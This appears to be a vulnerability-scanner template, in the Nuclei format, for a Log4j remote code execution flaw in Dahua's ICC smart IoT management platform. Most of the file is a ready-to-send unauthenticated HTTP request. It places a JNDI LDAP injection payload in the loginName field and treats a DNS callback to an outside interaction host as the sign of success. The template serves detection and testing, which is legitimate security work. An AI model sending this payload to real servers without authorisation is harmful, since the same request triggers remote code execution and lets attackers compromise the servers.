http:
    - matchers:
        - part: interactsh_protocol
          type: word
          words:
            - dns
      raw:
        - |
          POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
          Host: {{Hostname}}
          User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
          Content-Type: application/json;charset=utf-8

          {"loginName":"${jndi:ldap://{{interactsh-url}}}"}
id: dahua-random-log4j-rce
info:
    author: Superhero
    description: 大华ICC智能物联综合管理平台/evo-apigw/evo-brm/1.2.0/user/is-exist 接口处存在 l0g4i远程代码执行漏洞，未经身份验证的攻击者可以利用此漏洞远程代码执行，进一步构造系统内部利用链可导致服务器失陷,
    name: 大华智能物联综合管理平台 log4j远程代码执行漏洞
    severity: critical
    tags:
        - dahua
        - 大华智能物联综合管理平台
